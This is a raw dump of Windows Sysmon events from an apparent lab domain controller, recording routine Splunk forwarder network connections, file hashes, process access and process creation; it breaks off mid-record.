354300x80000000000000002200181Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:47.904{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55109-false10.0.1.12-8000- 23542300x80000000000000002200180Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:51.081{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DA01CDF47C9FD9FE8A84C201E16442A7,SHA256=E13C1F632262E01D3C7511BF277CC19808941E1FB5A48FD51906FEDD38B33D3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200183Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:52.378{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87E41C2B3AB8674FB0E5A6C94D153EDF,SHA256=8D716DA5BEA4C20FCF98EC7BF4D0D9AE6C99C8F60513E6ACE83A3717CA463692,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200184Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:53.378{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C9084ED1949357AC61B572C5F370A58,SHA256=B25DB88102D2D08171FF8B321D4EA1B519DE1988D61AB853718E897163D5B29A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200185Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:54.441{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED02A4CBCD2343B13209421B54805D23,SHA256=FD10EF0C26E0F8EEE19C8EDDF03C7B9083986E4A060583E1BA3765F66816E780,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200186Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:55.675{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60562C9F27D8D0A469EF2D3E27D1DD2F,SHA256=36A8577E871A1366D2AE2CCE5D4A95136FFD985BF7DA9D66F52D6C3EC8D40F37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200189Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:56.692{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A2A607887F7E5BFCD162950CF4D1DA6,SHA256=711BD1F91B2F0A710FC5E0BFA4B30355E9CF9AC6C10731948B0ECD91638C7377,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200188Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:56.098{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=829092175EF5817A73E747EC8453E634,SHA256=9098975E73E55202A894F4245F2E0982DBB142736C9D5F8E0D54D54E10BB2D03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200187Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:56.098{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6B71F649EA16D048526BA1567F2C3D44,SHA256=7E8484F8C7C40E6EC4C5DC57383821C1E532359BC6A1E1D06D04485F0B9D0F9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200193Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:57.694{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F186050D9C1E8A0F7CC9CECEDCF66B7,SHA256=7A02F76B93A3C65FB2D651551BA422C35ED09E97519CA2A64F44BA766909768D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200192Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:53.812{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55111-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002200191Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:53.812{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55111-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002200190Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:52.919{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55110-false10.0.1.12-8000- 23542300x80000000000000002200194Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:58.939{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EDCB1305A61C3B9B7DC3E8E9A9F46A8,SHA256=6993F730F8B4B171923C2F0D9468449B2B54E3C60857B9E6FC17C3B374693033,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200195Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:59.942{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA544882CB909685EDD78862D94119A2,SHA256=CCE121C3D077537BBBAD9F97632FBC7339376CE4DF849CC43E4D251A7C80F87D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200199Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:57.921{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55112-false10.0.1.12-8000- 23542300x80000000000000002200198Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:01.099{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B3ECD547BD2DC7FB8869B8E8846B8196,SHA256=ADD5D60A957B8AA9266CCAC9C4E465EE7D8FBFB2255EB070965DC8A0FDF7F1EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200197Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:01.099{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=829092175EF5817A73E747EC8453E634,SHA256=9098975E73E55202A894F4245F2E0982DBB142736C9D5F8E0D54D54E10BB2D03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200196Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:01.005{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=517D1BBEA4D237C06FBA0234CFFB2C13,SHA256=B283770D56DD378287709CF0A035519C51C98698B0751697BDC7EF8A9A7F4719,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200208Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:02.427{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E63E-6040-D34D-00000000AD01}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200207Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:02.427{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200206Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:02.427{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200205Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:02.427{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200204Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:02.427{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200203Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:02.427{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E63E-6040-D34D-00000000AD01}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200202Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:02.427{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E63E-6040-D34D-00000000AD01}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200201Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:02.428{5ABCFE62-E63E-6040-D34D-00000000AD01}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200200Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:02.005{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B21DCD28C37348D12A84D9E0D6FD919,SHA256=C816C129D5B6257C1269E1A436E9D7A87118B5A293040056E870C2BC470C6A31,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200227Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:03.677{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E63F-6040-D54D-00000000AD01}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200226Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:03.677{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200225Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:03.677{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200224Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:03.677{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200223Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:03.677{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200222Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:03.677{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E63F-6040-D54D-00000000AD01}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200221Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:03.677{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E63F-6040-D54D-00000000AD01}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200220Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:03.678{5ABCFE62-E63F-6040-D54D-00000000AD01}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200219Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:03.489{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B3ECD547BD2DC7FB8869B8E8846B8196,SHA256=ADD5D60A957B8AA9266CCAC9C4E465EE7D8FBFB2255EB070965DC8A0FDF7F1EA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200218Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:03.177{5ABCFE62-E63F-6040-D44D-00000000AD01}64046364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200217Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 